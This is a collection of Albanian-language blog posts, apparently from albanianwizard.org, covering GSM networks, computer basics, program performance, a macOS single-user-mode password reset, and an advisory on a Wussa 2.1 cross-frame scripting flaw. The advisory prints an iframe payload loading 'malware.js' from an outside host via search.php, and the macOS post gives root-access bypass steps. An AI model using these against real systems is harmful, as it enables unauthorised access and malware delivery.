Siç e pame pra, egzistojn “hapesira” te cilat nuk jane bosh, panvaresisht se jane te paeksploruara, kjo si pasoje e ç’rregullimeve “te rastesishme” te routerave, mendim te cilit nuk i bashkohem abzolutisht pasi nga ç’rregullimet nuk lind asgje tjeter perveç kaosit dhe ky eshte ligj universal i pamohueshem. Shembull konkret, hapim nje file txt, dhe fusim aty kod python, kod C++, D, Java, source kode te ndryshme pra, dhe e shpetojm failin si nje jpg, ose pdf, pra nuk eshte kurrsesi e mundur qe nga ky file te krijohet ‘diçka’ e rregullt ç’faredo lloj gjeje qoft ajo.
Bashkohem me shume me mendimin man-made te cilin sapo e lexuam tek CAIDA.
Dhe them se perceptimi yne eshte shume i kufizuar, keshtu qe nese ne nuk e perceptojm diçka nuk do te thote se ajo nuk egziston. Rast konkret psh per tingujt ultrasonore te cilet arritem ti njohim vetem ne saje te aparaturave speciale.
Pra as i degjojm , as i shohim, as i prekim, dhe shume pak i kuptojm.
Nese jeni duke menduar qe po dal nga tema, nuk eshte e vertet, sepse pashe me kujdes aplikacionet qe perdoren per analizimin e internetit dhe jane shume te pergjithshme panvaresisht teknikave qe perdorin.
Argument per kete:
Kush mund te me thote se si analizohet trafiku i nje lidhjeje me paketa te kriptuara duke perdorur ICMP ?
Edhe nese perdorim tools shume te avancuar per Arp MitM nuk do te kapnim as paketat e jo me ti dekriptonim ato.
Keshte qe ç’fare mund te presim nga analizimi i dikujt qe eshte jasht networkut ?
Pra, nese nje hapesire eshte e zene, do te thote qe eshte e zene nga diçka apo dikush, ndryshe tek idl do te kishte ngjyre tjeter 😉

Sistemi GSM

Atehere ne kete teme do tju pershkruaj pak se si funksionon rrjeti mobile (celular).

Duhet te dini qe Sistemi GSM qe perdoret nga ne sot per te komunikuar me celular punon ne frekuencen 900 dhe 1800 Mhz . Atehere duhet te dini qe Sistemi ka 3 nensisteme kryesore qe jane:

1.BSS (Base Station System)   2.NSS (Network Switching Subsystem)   3.NMS (Network Managment System)

BSS ndahet ne perbereset e saj qe jane BTC (antena) dhe TC (dekoduesi i sinjalit)

NSS perbehet nga MSC  sistemi i menaxhimit te lidhjes me rrjetin do te thoja nder pjeset kryesore. Pastaj ketu kemi edhe dy pjese te tjera qe quhen HLR dhe VLR keto dy pjese bejne te mundur ate qe quhet ndryshe percaktimin e vendodhjes se abonentit pra zonen apo qelizen ne te cilen gjendet abonenti qe do te kerkoj lidhjen dhe abonenti i cili do te marre lidhjen. Kete e relazion zakonisht HLR (Home location register) ndersa VLR (visitor location register) merret ne rastet kur abonenti nuk eshte i atij provider apo kur abontenti eshte ne levizje. Pra harroni te keni privacy, nese kujtoni se nuk mund ta di njeri se ku jeni kjo eshte e pa mundur pasi ne cdo moment HLR ka te regjistruar qelizen me te cilen eshte lidhur celulari juaj dhe ne kete menyre dihet dhe zona ne te cilen mbulon ajo qelize.

NMS (Network Managment System) Ketu kemi te bejme me serverin qe kontrollon dhe jep alarmin per cdo problem te rrjetit dhe te antenave. Ketu gjenden database te tera me info te ndryshme mbi antenat abonentet per NSS dhe BTS .

P.S nese dikush gjen ndonje ip te NMS te ndonje provideri shqiptar te me thote qe te penetrojme dhe te ulim tarifat ahahaha shaka.

Tani e ka rradhen MacOS-X 10.5.6 …

Ne kete teme te shkurter do te flasim per penetrimin fizik te macos-x duke marre akses pa limit tek kompiuterat e apple.

Si gjithmon ky material eshte vetem per qellime informative dhe nuk mbajm pergjegjesi nese nder lexuesit tane ka edhe nga ato kafshe (me falni per shprehjen) qe i perdorin keto informacione per qellime keqdashese.
Po ashtu vura re qe shume tema te albanianwizard.org po postohen neper forume shqiptare me autore nga me te ndryshmit te cilet nuk lene linkun e ketij webi tek webet e tyre duke mos respektuar punen tone gjithashtu liçencen creative commons 3.0 ne te cilen eshte edhe albanianwizard.org
Gjithsesi, per kete dukuri te turpshme ishim te njohur me perpara dhe na lajmeruan edhe miqte tane te truri.com keshtu qe nuk do e ulim veten te merremi me ju qe vidhni, dhe nuk do ua japim ate kenaqesi (qe te merremi me ju).
Shfrytezoj rastin per ti bere thirrje nje hajduti te albanianwizard.org qe te ndryshoje ngjyren e temave pasi E KUQA ti vret syte, sidomos ne tema te gjata.. :)
Mire vazhdojm me temen tone..
Vellai im ka nje macOS-X dhe i ndodhi te harronte passwordin dhe per te mos e formatuar perdorem kete menyre qe mund te jete shume e nevojshme ne raste te tilla.
1.Nderkohe qe kompiuteri ndizet mbajm shtypur Command+S deri sa te shikojm perpara nesh nje ekran komplet te zi dhe tekst te bardh dhe do shohim qe jemi root@localhost #
Mbas kesaj:
2. Japim keto komanda ne terminal:

/sbin/fsck –y
/sbin/mount –uw /

3.Perdorim komanden passwd per te ndryshuar passwordin dhe me sakt sintaksa:
passwd Arditi  (pra Arditi ne kete rast eshte perdoruesi)
Mbas kesaj do na kerkohet 2 here qe te perserisim passwordin dhe sugjeroj nje te thjesht 1234 pershembull dhe pastaj japim reboot dhe tek dritarja e loginit fusim username\password qe ndryshuam, mbas kesaj mund ta ndryshojm passwordin tek menaxhimi i akonteve.

Kompiuteri dhe funksionet e tij.

Kompiuteri..

Kompiuteri

Pamja e perditshme qe shohim perpara syve tane, por ç’fare ka ne brendesi te tij.[sdo e trajtojm ne kete teme] Cilet jane funksionet e tij?
Me kompiuter kuptojm nje ‘makine’ qe merret me perpunimin dhe manipulimin e te dhenave te bazuara ne instruksione. Atehere ja pak a shume brendesia e nje kompiuteri.

Brenda kompiuterit

Brenda kompiuterit

Mire, tani kemi nje pamje me te qarte.. Nese shohim ne internet kemi shume tema te tilla, dhe nuk do te doja te filloja tani me rradhe RAM, BUS, Procesori et duke shpjeguar komponentet e tij pasi me duket nje ide me shume qe te çorjenton se sa te orienton. Keshtu qe do e shpjegojm ne menyren tone organizimin e tij te ndare ne baze te funksioneve. Komponentet hardware do te analizohen 1 nga 1 ne blloqe (I\O, memorja, njesia qendrore) ne temat e ardhshme.

Kompiuteri sherben per perpunimin dhe manipulimin e te dhenave.

Ky eshte nje ligj qe duhet ta kemi te qarte, po atehere si behet organizimi ne brendesi te tij? Funksionet e kompiuterit jane shume te thjeshta. Siç e thame me siper kemi te bejm gjithmon me te dhena qe jane sinjale elektrike dhe ndryshe quhen bit. Keto funksione te thjeshta qe kane te bejne gjithmon me bite ndahen ne katershen e njohur:

Ja dhe “puna” dhe aftesia e nje kompiuteri..

1)Input – Aftesi per te marre te dhena nga “jasht” te dhena qe mund ti quajm dhe instruksione.
2)Ruajtje te dhenash – Aftesi per te ruajtur te dhena ose ne RAM ose ne memorjen auziliare (dytesore) disku i forte, usb-stick etj
3)
Perpunimi i te dhenave – Kjo eshte “aftesia me e madhe” qe behet nga proçesori dhe kemi te bejm me kontrollin dhe perpunimin e te dhenave.
4)
Output – Mbasi te dhenat perpunohen atehere te perpunuara japin nje rezultat tek perdoruesi ne baze te instruksioneve (siç u tha dhe me siper).

Ne baze te funksioneve jane dhe komponentet e kompiuterit qe ndahen ne 5 kategori te medha:

1)Grupi Input – Te gjitha ato rrangulla 😀 qe jane te afte te fusin te dhena ne kompiuter (tastiera qe eshte kryesori, mausi ose touch padi, skanerat etj)
2)
Memorja – e cila ndahet ne memorje primare dhe sekondare ,primarja eshte RAM, sekondarja eshte hardisku, dhe pjesa tjeter e paisjeve qe kane funksion per magazinim te dhenash qe mund te jene dhe komponent te jashtem (DVD, floppy, usb-stick etj)
3)
Per te mos e komplikuar Datapath dhe datacontrol [sepse per ta shpjeguar duhet te hallakatemi :p neper rregjistrat e sistemit] po i bashkojm ne ate qe quhet CPU apo Central Processor Unit, qe eshte njesia qe merret me kontrollimin , manipulimin dhe perpuninim e te gjitha ketyre te dhenave.
4)
Output – Paisjet qe nuk bejn asgje tjeter perveç se na paraqesin instruksionet tona te perpunuara nga proçesori tek keto paisje futen (ekrani , bokset, printeri, projektoret etj). Kjo ne pergjithesi eshte “tabloja e madhe” te cilen do mundohemi ta trajtojm me hollesisht ne te ardhmen.

Faktoret ndikues ne performancen e nje programi

Te gjith programatoret kane nje qellim te perbashket.
Te bejn nje program funksional, sa me te shpejt me performanca te larta, pa bug-e dhe te sigurt.
Pra eshte afer perfektes apo jo 😀
Por si gjithmon ç’do gje eshte relative… [Perveç Zotit I CILI eshte absolut dhe  Unik]
Atehere ç’fare ben qe programi yne te kete performanc te larte?

Algoritmet dhe rreshtat e kodit
Ky eshte faktori i pare qe ndikon ne performancen e programit tone, pra nje algoritem funksional dhe i thjesht, i shoqeruar me kontorrnon e pak rrjeshtave kodi shpesh here sjell nje program te shpejt dhe funksional. (keep it sample stupid)
Pra pak rreshta kodi = pak memorje, funksionalitet maksimal, rezultati eshte shume i mire gjithashtu duhet te kujdesemi edhe per RAM-in
Algoritmet e komplikuara shume here sjellin me shume ngaterresa se sa performanc, kjo eshte per tu mbajtur mend dhe per tu zbatuar sepse ndryshe edhe nese bejm nje program funksional ai me siguri do e kete shume te veshtire te kaloj fazen stresuese.

Gjuha e zgjedhur dhe kompilatori
Ky eshte nje faktor tjeter shume i rendesishem per performancen e programit pasi ka ndryshim nese programojm ne lisp dhe programojm ne… psh ZPL dhe ndikon shume po keshtu edhe kompilatori qe perdorim pasi duhet qe kodi qe do i dergohet proçesorit te jete sa me i “gelltitshem”

Sistemi Operativ \Kerneli \Organizimi i I\O
Ka shume ndryshim nje program i egzekutuar ne windows, dhe nje ne linux, po ashtu ne baze te kernelit dhe organizimit te Input output , menaxhimit qe ben kerneli proçeseve pasi shpesh here ndodh (windows) qe kerneli mos te jete ne gjendje te menaxhoj proçeset ne menyren e duhur dhe kemi krash te programeve dhe nuk eshte gjithmon fai i programeve.

Performancat Hardware
Normalisht sa me i shpejt te jete proçesori, BUS-i, RAM, aq me shpejt do te egzekutohet informacioni qe kalohet nga shtresat e ndryshme qe prej userit deri tek ALU

Portabiliteti
Portabiliteti sjell panvaresi te programit dhe ka ardhur me ideologjine “stand alone” pra duke mos pasur nevoje per shume kerkesa, gje qe kjo mund te behet nje faktor i rendesishem per stabilietin e nje programi me madhesi te madhe, ose te ndonje platforme.

Wussa 2.1 vulnerabilitet Cross frame scripting.

Zakonisht nuk merrem me keto gjera, e sidomos me studimin e nje platforme qe as me ka rene rasti ta perdor..
Isha thjesht duke pare galerine e imazheve te nje mikut tim te cilin tani e pershendes, dhe u bera kurioz per te testuar search.php te platformes “image hosting” qe kishte instaluar..
Eshte per te qeshur metoda e ketyre programatoreve (e kam fjalen per ata qe krijojn keto CMS-t) ne kontrollimin e inputeve dhe mbrojtjen nga sulme te lloit CSS, apo XSS siç i quajn tani..
Me vjen per te qeshur sepse kontrollojn vetem : <script>alert(‘CSS’);</script> dhe kujtojn se jane mbrojtur kunder sulmeve te tilla.. Nderkohe qe ka shume menyra manipulimi http://ha.ckers.org/xss.html

Mire spo e zagjasim shume, kalojm tek exploiti yne 0-day.
Te infektuar : Wussa 2.1 dhe versionet me te vogla
Prodhuesi : http://wussa.com/
Exploit : tek search.php shkruajm : <iframe src=www.webikeq.com/malware.js></iframe> dhe do te shikojm qe ne faqen qe do te krijohet do te shohim nje frame me te perfshire ndonje kod keqdashes..

Normalisht i dergova nje e-mail programatorit te saj, qe si zakonisht nuk dergojn pergjigje sepse jane shume krenar per te pranuar qe shesin prodhime difektoze..(dhe vura re qe tek webi i tij tek /demo thjesht ka bere nje manipulim por vulnerabilitetin nuk e ka rregulluar)
Gjithsesi nga lexuesit e albanianwizard.org kerkohet vetem qe te mos behet publik ky vulnerabilitet perpara se te nxjerrin version te ri ku ta kene rregulluar vulnerabilitetin ne fjale..
Nuk do te doja qe script kiddie-t te fillonin me avazet e tyre..
arditi.